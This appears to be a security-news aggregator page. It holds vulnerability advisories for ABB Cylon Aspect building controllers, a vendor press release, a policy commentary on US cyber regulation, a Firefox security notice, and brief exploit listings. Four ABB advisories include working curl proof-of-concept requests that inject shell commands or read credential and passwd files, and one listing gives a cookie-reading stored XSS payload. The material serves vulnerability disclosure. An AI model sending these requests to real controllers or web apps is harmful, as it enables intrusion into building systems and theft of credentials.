This is a thorough write up of how to exploit a local privilege escalation vulnerability in iTunes for Windows version 12.13.2.3. Apple fixed this in version 12.13.3.

iTunes For Windows 12.13.2.3 Local Privilege Escalation

ABB Cylon Aspect versions 3.08.00 and below suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the SYSLOG HTTP POST parameter called by the syslogSwitch.php script.

    ABB Cylon Aspect 3.08.00 (syslogSwitch.php) Remote Code ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.00Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an authenticated OS commandinjection vulnerability. This can be exploited to inject and execute arbitraryshell commands through the 'SYSLOG' HTTP POST parameter called by the syslogSwitch.phpscript.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5835Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5835.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ curl -sX POST http://192.168.73.31/syslogSwitch.php \> -H "Cookie: PHPSESSID=xxx" \> -d "SYSLOG=`id`&Submit=Save" \> | grep "Logger enabled"Logger enabled: uid=48(apache) gid=48(apache) groups=48(apache),0(root) <br>Logger configuration complete <br>

ABB Cylon Aspect 3.08.00 syslogSwitch.php Remote Code Execution

ABB Cylon Aspect versions 3.08.01 and below suffer from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the Footer HTTP POST parameter called by the caldavUtil.php script.

  
ABB Cylon Aspect 3.08.01 (caldavUtil.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'Footer' HTTP POST parameter called by the caldavUtil.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5834  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5834.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST "http://192.168.73.31/caldavUtil.php" -d "command=postFooter&Footer=%60id%60"  
Set footer to uid=33(www-data) gid=33(www-data) groups=33(www-data):

ABB Cylon Aspect 3.08.01 caldavUtil.php Remote Code Execution

Torrance, United States / California, 7th October 2024, CyberNewsWire

**Torrance, United States / California, October 7th, 2024, CyberNewsWire**

Criminal IP, a renowned Cyber Threat Intelligence (CTI) search engine developed by AI SPERA, has partnered with Hybrid Analysis, a platform that provides advanced malware analysis and threat intelligence, to enhance threat research.

This collaboration integrates Criminal IP’s advanced domain scanning capabilities into the Hybrid Analysis platform, providing security professionals with deeper insights and more effective threat mitigation strategies.

**Comprehensive Malware and Domain Analysis**

Hybrid Analysis employs dynamic and static techniques for thorough malware analysis. Real-time execution environments and memory dumps generate annotated disassembly listings and critical Indicators of Compromise (IOCs).

Criminal IP specializes in real-time domain scanning, scrutinizing domains for phishing, malware, and illicit activities. Integration enriches threat profiles, improving threat detection accuracy.

**Key Benefits of the Collaboration:**

*   **Enhanced Threat Profiling**: Security professionals can gain deeper insights into the origins and behaviors of threats identified through Hybrid Analysis, enriched with Criminal IP’s data.
*   **Real-Time Domain Analysis**: Integration with Criminal IP enables users to conduct real-time scans on domains of interest, which is crucial for accurately identifying emerging threats promptly.
*   **Comprehensive Security Insights**: Users gain access to detailed domain attributes such as phishing records, abuse incidents, and detection of embedded malicious code, enhancing their ability to analyze for signs of Domain Generation Algorithms (DGA) and phishing probabilities.
*   **Interactive Score Card**: Users can quickly assess domain status, accessing additional details directly from Criminal IP database to make informed decisions based on the latest threat intelligence.

**Criminal IP’s Advanced Real-Time Threat Detection**

In addition to this comprehensive maliciousness result, uses seeking information about each component and false positives can visit Criminal IP.

<Example of Criminal IP Domain Search for malicious URL>

The URL scan feature allows users to extract a wealth of data, including network logs, associated IP addresses, malicious links, and website vulnerabilities.

Users of Criminal IP Domain Search can access valuable insights such as technology usage specifics, abuse records, and identified CVE vulnerabilities, all conveniently consolidated on a single page.

This robust search engine offers three customizable subscription plans—Lite, Medium, and Pro—including a Free membership option.

To determine the most suitable plan based on user’s volume of IP Lookup and URL Scan/Lookup requirements, users can explore the Free membership, monitor their credit usage through a user-friendly dashboard, and take advantage of key features for gaining valuable insights.

**About AI SPERA**

AI SPERA, a leader in Cyber Threat Intelligence (CTI) solutions, significantly expanded its reach by launching its flagship solution, Criminal IP, in 2023.

Since then, the company has formed technical and business collaborations with over 40 renowned global security firms, including Hybrid Analysis, VirusTotal, Cisco, Tenable, Sumo Logic, and Quad9.

Besides the CTI search engine, the company offers Criminal IP ASM, a SaaS-based Attack Surface Management Solution on AWS Marketplace and Azure Marketplace, and Criminal IP FDS, an AI-based Anomaly Detection Solution for credential stuffing prevention and fraud detection.

Available in five languages (English, French, Arabic, Korean, and Japanese), the search engine provides a powerful service for users worldwide.

**Contact**

**Michael Sena**  
**AI SPERA**  
**\[email protected\]**

Hybrid Analysis Utilizes Criminal IP’s Robust Domain Data for Better Malware Detection

Creating a new office of cyber-regulation strategy is the government's best opportunity to improve security and to protect Americans in an increasingly dangerous world.

Jason Healey, Senior Research Scholar, Columbia University School of International and Public Affairs

October 7, 2024

5 Min Read

Source: Martin Shields via Alamy Stock Photo

COMMENTARY

Regulation is the most complex and politically sensitive cybersecurity measure ever undertaken by the US government.  

The most important step the White House can take is starting a cyber-regulation strategy and creating a new office within the Office of the National Cyber Director (ONCD) to drive smart regulation and harmonization. 

**Regulating Cybersecurity: Strategy Needed**

Government mandates, especially ones to regulate an area tied to speech, touch at the heart of the role of government in a free society. They are far more inherently political than most other cybersecurity initiatives, such as building the cyber workforce, a topic for which ONCD has already created a dedicated strategy. 

Cyber regulation is also exceedingly complex. To improve cybersecurity, the government might impose minimum baseline cybersecurity controls for critical infrastructures (for everything from rail to customer information held by banks), charge companies for fraud under the False Claims Act, use securities laws to criminally charge corporate security executives, impose labeling requirements for smart devices, or regulate cybersecurity for broadband Internet access. 

The US government is defaulting to doing all of these, plus many more, all at once. 

Some of these initiatives are more in line with the president's strategy and priorities than others; some are best done first, others later; some might be challenged in court, post-Chevron; and some will impose larger costs, for fewer gains, than others seeking the same end. 

All will create winners and losers. Unlike efforts to fix the cyber workforce, some might even affect the outcome of elections. 

ONCD must accordingly develop a new strategy (or at least a less-formal road map) for regulating cyberspace, laying out the major options and trade-offs, timelines, and measures of success. The final deciders must be the nation's political leadership in the National Security Council and National Economic Council. 

**New White House Office Also Needed**

To ensure the success of the cyber-workforce strategy, ONCD created a dedicated team, led by an assistant national cyber director. ONCD must create another such special office to focus on the far more politically sensitive and complex topic of regulation. 

ONCD's office would work to not just "create a coherent regulatory system and harmonize cybersecurity requirements," as recommended by the American Chamber of Commerce, or oversee a Harmonization Committee, per a recent Senate bill. It would draft the strategy, develop an implementation plan and track completion, develop frameworks to harmonize regulations, champion mutual recognition, and help oversee if regulations are working and at reasonable cost. 

This office would work with other departments and agencies — especially the Cybersecurity Forum for Independent and Executive Branch Regulators and the Cybersecurity and Infrastructure Security Agency, recently tasked to harmonize critical infrastructure regulations.  

And there are a lot regulations needing coordination. Just in the past few months, there is not only the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA), but also: 

1\. Cybersecurity in the Marine Transportation System, "establishing minimum cybersecurity requirements for U.S. flagged vessels" (from the Coast Guard)  

2\. Data Breach Reporting Requirements for telecommunications providers (the Federal Communications Commission) 

3\. Cybersecurity Labeling for Internet of Things (IoT) (FCC) 

4\. Cybersecurity Maturity Model Certification for contractors (Department of Defense) 

5\. Significant Cybersecurity Incident Reporting Requirements for federally approved mortgage lenders (Department of Housing and Urban Development) 

6\. New requirements for US infrastructure-as-a-service (IaaS) providers (Department of Commerce) 

Meanwhile, the Environmental Protection Agency is "increasing inspections and enforcement" of community water systems and "the Centers for Medicare and Medicaid Services (CMS) will be drafting new rules" for hospitals. 

ONCD's harmonization efforts have been solid, led by Nick Leiserson, Brian Scott, and Elizabeth Irwin, among others. But this team is also working on a wide range of other policies and programs, such as including cyber in federal grants to states. Regulation, complex, and politically fraught, deserves a dedicated team and leadership. 

**But It's Close to an Election!**

The next presidential administration may be less eager to regulate than this one, but it will still need a regulatory plan of some sort to coordinate and harmonize between independent agencies and engage with states and the European Union.  

ONCD is staffed not just by political appointees and detailed civil servants — as is the National Security Council, the traditional heart of White House cyber policymaking — but also permanent staff. Starting the work on such a document now can help the smartest policies to survive between administrations and improve predictability for regulated companies. 

This is the White House's best opportunity for perhaps a generation to get this right, to improve security, to protect Americans in an increasingly dangerous world, and to decrease the cost and improve predictability for companies building our digitized economy. 

If the White House doesn't solve other important cyber issues, future administrations will have other chances. The critics fighting regulation will not be so forgiving. 

**About the Author**

Senior Research Scholar, Columbia University School of International and Public Affairs

Jason Healey is a senior research scholar at Columbia University’s School for International and Public Affairs, specializing in cyber-risk and conflict.  Jason was a founding member of both the Office of the National Cyber Director at the White House (2022) and the first cyber command in the world, the Joint Task Force for Computer Network Defense, in 1998. He created Goldman Sachs’ first capabilities for cyber-incident response and threat intelligence and later oversaw the bank’s crisis management and business continuity in Asia. He served as the vice chair of the Financial Services Information Sharing and Analysis Center (FS-ISAC), and is a certified board director (NACD.DC) and information systems security professional (CISSP).

What the White House Should Do Next for Cyber Regulation

ABB Cylon Aspect versions 3.08.00 and below suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the timeserver HTTP POST parameter called by the setTimeServer.php script.

  
ABB Cylon Aspect 3.08.00 (setTimeServer.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'timeserver' HTTP POST parameter called by the  
setTimeServer.php script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5833  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5833.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST http://192.168.73.31/setTimeServer.php \  
> -d "timeserver=0.pool.ntp.org`cat /etc/passwd`"  
0.pool.ntp.orgroot:x:0:0:root:/home/root:/bin/sh

ABB Cylon Aspect 3.08.00 setTimeServer.php Remote Code Execution

ABB Cylon Aspect versions 3.08.01 and below suffer from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the logFile GET parameter via the logYumLookup.php script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

  
ABB Cylon Aspect 3.08.01 (logYumLookup.php) Unauthenticated File Disclosure

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an unauthenticated arbitrary  
file disclosure vulnerability. Input passed through the 'logFile' GET parameter  
via the 'logYumLookup.php' script is not properly verified before being used  
to download log files. This can be exploited to disclose the contents of arbitrary  
and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5832  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5832.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/logYumLookup.php?logFile=user.properties  
#Users  
#Sat Apr 20 19:40:39 EDT 2024  
guest=6775657374  
test=74657374  
aamuser=64656661756c74

ABB Cylon Aspect 3.08.01 logYumLookup.php Unauthenticated File Disclosure

Ubuntu Security Notice 7056-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Masato Kinugawa discovered that Firefox did not properly validate javascript under the "resource://pdf.js" origin. An attacker could potentially exploit this issue to execute arbitrary javascript code and access cross-origin PDF content.

    ==========================================================================Ubuntu Security Notice USN-7056-1October 07, 2024firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2024-9392,CVE-2024-9396, CVE-2024-9397, CVE-2024-9398, CVE-2024-9399, CVE-2024-9400,CVE-2024-9401, CVE-2024-9402, CVE-2024-9403)Masato Kinugawa discovered that Firefox did not properly validatejavascript under the "resource://pdf.js" origin. An attacker couldpotentially exploit this issue to execute arbitrary javascript code andaccess cross-origin PDF content. (CVE-2024-9393)Masato Kinugawa discovered that Firefox did not properly validatejavascript under the "resource://devtools" origin. An attacker couldpotentially exploit this issue to execute arbitrary javascript code andaccess cross-origin JSON content. (CVE-2024-9394)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         131.0+build1.1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7056-1  CVE-2024-9392, CVE-2024-9393, CVE-2024-9394, CVE-2024-9396,  CVE-2024-9397, CVE-2024-9398, CVE-2024-9399, CVE-2024-9400,  CVE-2024-9401, CVE-2024-9402, CVE-2024-9403Package Information:  https://launchpad.net/ubuntu/+source/firefox/131.0+build1.1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7056-1

ManageEngine ADManager Plus builds prior to 7210 suffers from a privilege escalation vulnerability.

    # Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of Privilege Vulnerability# Exploit Author: Metin Yunus Kandemir# Vendor Homepage: https://www.manageengine.com/# Software Link: https://www.manageengine.com/products/ad-manager/# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409# Version: ADManager Plus Build < 7210# Tested against: Build 7203# CVE: CVE-2024-24409# DescriptionThe Modify Computers is a predefined role in ADManager for managing computers. If a technician user has the Modify Computers privilegeover a computer can change the userAccountControl and msDS-AllowedToDelegateTo attributes of the computer object. In this way, the technician user can set Constrained Kerberos Delegation over any computer within the Organizational Unit that the user was delegated so that the attacker can perform DCSync after setting Constrained Kerberos Delegation over a computer for LDAP service of a Domain Controller server.# Proof Of Concepthttps://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409

ManageEngine ADManager Plus Privilege Escalation

Book Recording App, as submitted on 2024-09-24, suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Book Recording App - Cross Site Scripting (Stored XSS)# Date: 05/10/2024# Exploit Author: Arif Ari# Vendor Homepage: https://www.sourcecodester.com/javascript/17600/book-recording-app-using-htmlcss-vanillajs-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=17600&title=Book+Recording+App+using+HTML%26CSS+in+VanillaJS+with+Source+Code# Tested on: Windows / XAMPP# Title and Author parameters is vulnerable to stored xss. You can vulnerability this xss payload:# <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>####### Raw URL ######## http://localhost/book-recording-app-using-html-css-in-vanillajs/#

Latest News